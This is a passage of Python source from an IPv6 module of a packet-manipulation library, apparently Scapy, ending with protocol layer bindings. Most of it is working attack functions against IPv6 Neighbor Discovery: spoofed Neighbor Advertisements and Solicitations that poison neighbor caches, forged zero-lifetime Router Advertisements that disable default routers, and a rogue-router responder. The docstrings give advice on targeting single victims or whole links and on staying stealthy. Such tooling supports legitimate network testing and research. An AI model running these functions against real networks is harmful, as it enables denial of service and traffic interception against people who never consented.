req[IPv6].dst 3581 tgt = req[ICMPv6ND_NS].tgt 3582 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) 3583 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 3584 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3585 sendp(rep, iface=iface, verbose=0) 3586 3587 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3588 3589 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 3590 tgt_filter, reply_mac) 3591 3592 3593def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 3594 reply_mac=None, router=False): 3595 """ 3596 The main purpose of this function is to send fake Neighbor Advertisement 3597 messages to a victim. As the emission of unsolicited Neighbor Advertisement 3598 is pretty pointless (from an attacker standpoint) because it will not 3599 lead to a modification of a victim's neighbor cache, the function send 3600 advertisements in response to received NS (NS sent as part of the DAD, 3601 i.e. with an unspecified address as source, are not considered). 3602 3603 By default, the fake NA sent to create the DoS uses: 3604 - as target address the target address found in received NS. 3605 - as IPv6 source address: the target address 3606 - as IPv6 destination address: the source IPv6 address of received NS 3607 message. 3608 - the mac address of the interface as source (or reply_mac, see below). 3609 - the source mac address of the received NS as destination macs address 3610 of the emitted NA. 3611 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 3612 filled with the mac address used as source of the NA. 3613 3614 Following arguments can be used to change the behavior: 3615 3616 iface: a specific interface (e.g. "eth0") of the system on which the 3617 DoS should be launched. If None is provided conf.iface is used. 3618 3619 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3620 Only NS messages received from this source will trigger replies. 3621 This allows limiting the effects of the DoS to a single target by 3622 filtering on its mac address. The default value is None: the DoS 3623 is not limited to a specific mac address. 3624 3625 tgt_filter: Same as previous but for a specific target IPv6 address for 3626 received NS. If the target address in the NS message (not the IPv6 3627 destination address) matches that address, then a fake reply will 3628 be sent, i.e. the emitter will be a target of the DoS. 3629 3630 reply_mac: allow specifying a specific source mac address for the reply, 3631 i.e. to prevent the use of the mac address of the interface. This 3632 address will also be used in the Target Link-Layer Address option. 3633 3634 router: by the default (False) the 'R' flag in the NA used for the reply 3635 is not set. If the parameter is set to True, the 'R' flag in the 3636 NA is set, advertising us as a router. 3637 3638 Please, keep the following in mind when using the function: for obvious 3639 reasons (kernel space vs. Python speed), when the target of the address 3640 resolution is on the link, the sender of the NS receives 2 NA messages 3641 in a row, the valid one and our fake one. The second one will overwrite 3642 the information provided by the first one, i.e. the natural latency of 3643 Scapy helps here. 3644 3645 In practice, on a common Ethernet link, the emission of the NA from the 3646 genuine target (kernel stack) usually occurs in the same millisecond as 3647 the receipt of the NS. The NA generated by Scapy6 will usually come after 3648 something 20+ ms. On a usual testbed for instance, this difference is 3649 sufficient to have the first data packet sent from the victim to the 3650 destination before it even receives our fake NA. 3651 """ 3652 3653 def is_request(req, mac_src_filter, tgt_filter): 3654 """ 3655 Check if packet req is a request 3656 """ 3657 3658 # Those simple checks are based on Section 5.4.2 of RFC 4862 3659 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3660 return 0 3661 3662 mac_src = req[Ether].src 3663 if mac_src_filter and mac_src != mac_src_filter: 3664 return 0 3665 3666 # Source must NOT be the unspecified address 3667 if req[IPv6].src == "::": 3668 return 0 3669 3670 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3671 if tgt_filter and tgt != tgt_filter: 3672 return 0 3673 3674 dst = req[IPv6].dst 3675 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 3676 3677 # If this is a real address resolution NS, then the destination 3678 # address of the packet is the link-local solicited node multicast 3679 # address associated with the target of the NS. 3680 # Otherwise, the NS is a NUD related one, i.e. the peer is 3681 # unicasting the NS to check the target is still alive (L2 3682 # information is still in its cache and it is verified) 3683 received_snma = inet_pton(socket.AF_INET6, dst) 3684 expected_snma = in6_getnsma(tgt) 3685 if received_snma != expected_snma: 3686 print("solicited node multicast @ does not match target @!") 3687 return 0 3688 3689 return 1 3690 3691 def reply_callback(req, reply_mac, router, iface): 3692 """ 3693 Callback that reply to a NS with a spoofed NA 3694 """ 3695 3696 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 3697 # send it back. 3698 mac = req[Ether].src 3699 pkt = req[IPv6] 3700 src = pkt.src 3701 tgt = req[ICMPv6ND_NS].tgt 3702 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) 3703 # Use the target field from the NS 3704 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 3705 3706 # "If the solicitation IP Destination Address is not a multicast 3707 # address, the Target Link-Layer Address option MAY be omitted" 3708 # Given our purpose, we always include it. 3709 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3710 3711 sendp(rep, iface=iface, verbose=0) 3712 3713 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3714 3715 if not iface: 3716 iface = conf.iface 3717 # To prevent sniffing our own traffic 3718 if not reply_mac: 3719 reply_mac = get_if_hwaddr(iface) 3720 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3721 3722 router = 1 if router else 0 # Value of the R flags in NA 3723 3724 sniff(store=0, 3725 filter=sniff_filter, 3726 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3727 prn=lambda x: reply_callback(x, reply_mac, router, iface), 3728 iface=iface) 3729 3730 3731def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 3732 dst=None, src_mac=None, dst_mac=None, loop=True, 3733 inter=1, iface=None): 3734 """ 3735 The main purpose of this function is to send fake Neighbor Solicitations 3736 messages to a victim, in order to either create a new entry in its neighbor 3737 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 3738 that a node SHOULD create the entry or update an existing one (if it is not 3739 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 3740 state is set to STALE. 3741 3742 The two main parameters of the function are the source link-layer address 3743 (carried by the Source Link-Layer Address option in the NS) and the 3744 source address of the packet. 3745 3746 Unlike some other NDP_Attack_* function, this one is not based on a 3747 stimulus/response model. When called, it sends the same NS packet in loop 3748 every second (the default) 3749 3750 Following arguments can be used to change the format of the packets: 3751 3752 src_lladdr: the MAC address used in the Source Link-Layer Address option 3753 included in the NS packet. This is the address that the peer should 3754 associate in its neighbor cache with the IPv6 source address of the 3755 packet. If None is provided, the mac address of the interface is 3756 used. 3757 3758 src: the IPv6 address used as source of the packet. If None is provided, 3759 an address associated with the emitting interface will be used 3760 (based on the destination address of the packet). 3761 3762 target: the target address of the NS packet. If no value is provided, 3763 a dummy address (2001:db8::1) is used. The value of the target 3764 has a direct impact on the destination address of the packet if it 3765 is not overridden. By default, the solicited-node multicast address 3766 associated with the target is used as destination address of the 3767 packet. Consider specifying a specific destination address if you 3768 intend to use a target address different than the one of the victim. 3769 3770 dst: The destination address of the NS. By default, the solicited node 3771 multicast address associated with the target address (see previous 3772 parameter) is used if no specific value is provided. The victim 3773 is not expected to check the destination address of the packet, 3774 so using a multicast address like ff02::1 should work if you want 3775 the attack to target all hosts on the link. On the contrary, if 3776 you want to be more stealth, you should provide the target address 3777 for this parameter in order for the packet to be sent only to the 3778 victim. 3779 3780 src_mac: the MAC address used as source of the packet. By default, this 3781 is the address of the interface. If you want to be more stealth, 3782 feel free to use something else. Note that this address is not the 3783 that the victim will use to populate its neighbor cache. 3784 3785 dst_mac: The MAC address used as destination address of the packet. If 3786 the IPv6 destination address is multicast (all-nodes, solicited 3787 node, ...), it will be computed. If the destination address is 3788 unicast, a neighbor solicitation will be performed to get the 3789 associated address. If you want the attack to be stealth, you 3790 can provide the MAC address using this parameter. 3791 3792 loop: By default, this parameter is True, indicating that NS packets 3793 will be sent in loop, separated by 'inter' seconds (see below). 3794 When set to False, a single packet is sent. 3795 3796 inter: When loop parameter is True (the default), this parameter provides 3797 the interval in seconds used for sending NS packets. 3798 3799 iface: to force the sending interface. 3800 """ 3801 3802 if not iface: 3803 iface = conf.iface 3804 3805 # Use provided MAC address as source link-layer address option 3806 # or the MAC address of the interface if none is provided. 3807 if not src_lladdr: 3808 src_lladdr = get_if_hwaddr(iface) 3809 3810 # Prepare packets parameters 3811 ether_params = {} 3812 if src_mac: 3813 ether_params["src"] = src_mac 3814 3815 if dst_mac: 3816 ether_params["dst"] = dst_mac 3817 3818 ipv6_params = {} 3819 if src: 3820 ipv6_params["src"] = src 3821 if dst: 3822 ipv6_params["dst"] = dst 3823 else: 3824 # Compute the solicited-node multicast address 3825 # associated with the target address. 3826 tmp = inet_ntop(socket.AF_INET6, 3827 in6_getnsma(inet_pton(socket.AF_INET6, target))) 3828 ipv6_params["dst"] = tmp 3829 3830 pkt = Ether(**ether_params) 3831 pkt /= IPv6(**ipv6_params) 3832 pkt /= ICMPv6ND_NS(tgt=target) 3833 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 3834 3835 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 3836 3837 3838def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 3839 ip_src_filter=None, reply_mac=None, 3840 tgt_mac=None): 3841 """ 3842 The purpose of the function is to monitor incoming RA messages 3843 sent by default routers (RA with a non-zero Router Lifetime values) 3844 and invalidate them by immediately replying with fake RA messages 3845 advertising a zero Router Lifetime value. 3846 3847 The result on receivers is that the router is immediately invalidated, 3848 i.e. the associated entry is discarded from the default router list 3849 and destination cache is updated to reflect the change. 3850 3851 By default, the function considers all RA messages with a non-zero 3852 Router Lifetime value but provides configuration knobs to allow 3853 filtering RA sent by specific routers (Ethernet source address). 3854 With regard to emission, the multicast all-nodes address is used 3855 by default but a specific target can be used, in order for the DoS to 3856 apply only to a specific host. 3857 3858 More precisely, following arguments can be used to change the behavior: 3859 3860 iface: a specific interface (e.g. "eth0") of the system on which the 3861 DoS should be launched. If None is provided conf.iface is used. 3862 3863 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3864 Only RA messages received from this source will trigger replies. 3865 If other default routers advertised their presence on the link, 3866 their clients will not be impacted by the attack. The default 3867 value is None: the DoS is not limited to a specific mac address. 3868 3869 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 3870 on. Only RA messages received from this source address will trigger 3871 replies. If other default routers advertised their presence on the 3872 link, their clients will not be impacted by the attack. The default 3873 value is None: the DoS is not limited to a specific IPv6 source 3874 address. 3875 3876 reply_mac: allow specifying a specific source mac address for the reply, 3877 i.e. to prevent the use of the mac address of the interface. 3878 3879 tgt_mac: allow limiting the effect of the DoS to a specific host, 3880 by sending the "invalidating RA" only to its mac address. 3881 """ 3882 3883 def is_request(req, mac_src_filter, ip_src_filter): 3884 """ 3885 Check if packet req is a request 3886 """ 3887 3888 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 3889 return 0 3890 3891 mac_src = req[Ether].src 3892 if mac_src_filter and mac_src != mac_src_filter: 3893 return 0 3894 3895 ip_src = req[IPv6].src 3896 if ip_src_filter and ip_src != ip_src_filter: 3897 return 0 3898 3899 # Check if this is an advertisement for a Default Router 3900 # by looking at Router Lifetime value 3901 if req[ICMPv6ND_RA].routerlifetime == 0: 3902 return 0 3903 3904 return 1 3905 3906 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 3907 """ 3908 Callback that sends an RA with a 0 lifetime 3909 """ 3910 3911 # Let's build a reply and send it 3912 3913 src = req[IPv6].src 3914 3915 # Prepare packets parameters 3916 ether_params = {} 3917 if reply_mac: 3918 ether_params["src"] = reply_mac 3919 3920 if tgt_mac: 3921 ether_params["dst"] = tgt_mac 3922 3923 # Basis of fake RA (high pref, zero lifetime) 3924 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") 3925 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 3926 3927 # Add it a PIO from the request ... 3928 tmp = req 3929 while ICMPv6NDOptPrefixInfo in tmp: 3930 pio = tmp[ICMPv6NDOptPrefixInfo] 3931 tmp = pio.payload 3932 del(pio.payload) 3933 rep /= pio 3934 3935 # ... and source link layer address option 3936 if ICMPv6NDOptSrcLLAddr in req: 3937 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 3938 else: 3939 mac = req[Ether].src 3940 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 3941 3942 sendp(rep, iface=iface, verbose=0) 3943 3944 print("Fake RA sent with source address %s" % src) 3945 3946 if not iface: 3947 iface = conf.iface 3948 # To prevent sniffing our own traffic 3949 if not reply_mac: 3950 reply_mac = get_if_hwaddr(iface) 3951 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3952 3953 sniff(store=0, 3954 filter=sniff_filter, 3955 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 3956 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 3957 iface=iface) 3958 3959 3960def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 3961 ip_src_filter=None): 3962 """ 3963 The purpose of this function is to send provided RA message at layer 2 3964 (i.e. providing a packet starting with IPv6 will not work) in response 3965 to received RS messages. In the end, the function is a simple wrapper 3966 around sendp() that monitor the link for RS messages. 3967 3968 It is probably better explained with an example: 3969 3970 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 3971 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 3972 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 3973 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 3974 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 3975 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 3976 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 3977 ... 3978 3979 Following arguments can be used to change the behavior: 3980 3981 ra: the RA message to send in response to received RS message. 3982 3983 iface: a specific interface (e.g. "eth0") of the system on which the 3984 DoS should be launched. If none is provided, conf.iface is 3985 used. 3986 3987 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3988 Only RS messages received from this source will trigger a reply. 3989 Note that no changes to provided RA is done which imply that if 3990 you intend to target only the source of the RS using this option, 3991 you will have to set the Ethernet destination address to the same 3992 value in your RA. 3993 The default value for this parameter is None: no filtering on the 3994 source of RS is done. 3995 3996 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 3997 on. Only RS messages received from this source address will trigger 3998 replies. Same comment as for previous argument apply: if you use 3999 the option, you will probably want to set a specific Ethernet 4000 destination address in the RA. 4001 """ 4002 4003 def is_request(req, mac_src_filter, ip_src_filter): 4004 """ 4005 Check if packet req is a request 4006 """ 4007 4008 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 4009 return 0 4010 4011 mac_src = req[Ether].src 4012 if mac_src_filter and mac_src != mac_src_filter: 4013 return 0 4014 4015 ip_src = req[IPv6].src 4016 if ip_src_filter and ip_src != ip_src_filter: 4017 return 0 4018 4019 return 1 4020 4021 def ra_reply_callback(req, iface): 4022 """ 4023 Callback that sends an RA in reply to an RS 4024 """ 4025 4026 src = req[IPv6].src 4027 sendp(ra, iface=iface, verbose=0) 4028 print("Fake RA sent in response to RS from %s" % src) 4029 4030 if not iface: 4031 iface = conf.iface 4032 sniff_filter = "icmp6" 4033 4034 sniff(store=0, 4035 filter=sniff_filter, 4036 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 4037 prn=lambda x: ra_reply_callback(x, iface), 4038 iface=iface) 4039 4040############################################################################# 4041# Pre-load classes ## 4042############################################################################# 4043 4044 4045def _get_cls(name): 4046 return globals().get(name, Raw) 4047 4048 4049def _load_dict(d): 4050 for k, v in d.items(): 4051 d[k] = _get_cls(v) 4052 4053 4054_load_dict(icmp6ndoptscls) 4055_load_dict(icmp6typescls) 4056_load_dict(ipv6nhcls) 4057 4058############################################################################# 4059############################################################################# 4060# Layers binding # 4061############################################################################# 4062############################################################################# 4063 4064conf.l3types.register(ETH_P_IPV6, IPv6) 4065conf.l2types.register(31, IPv6) 4066conf.l2types.register(DLT_IPV6, IPv6) 4067conf.l2types.register(DLT_RAW, IPv46) 4068conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) 4069 4070bind_layers(Ether, IPv6, type=0x86dd) 4071bind_layers(CookedLinux, IPv6, proto=0x86dd) 4072bind_layers(GRE, IPv6, proto=0x86dd) 4073bind_layers(SNAP, IPv6, code=0x86dd) 4074bind_layers(Loopback, IPv6, type=socket.AF_INET6) 4075bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) 4076bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) 4077bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) 4078bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) 4079bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) 4080bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) 4081bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) 4082bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE) 4083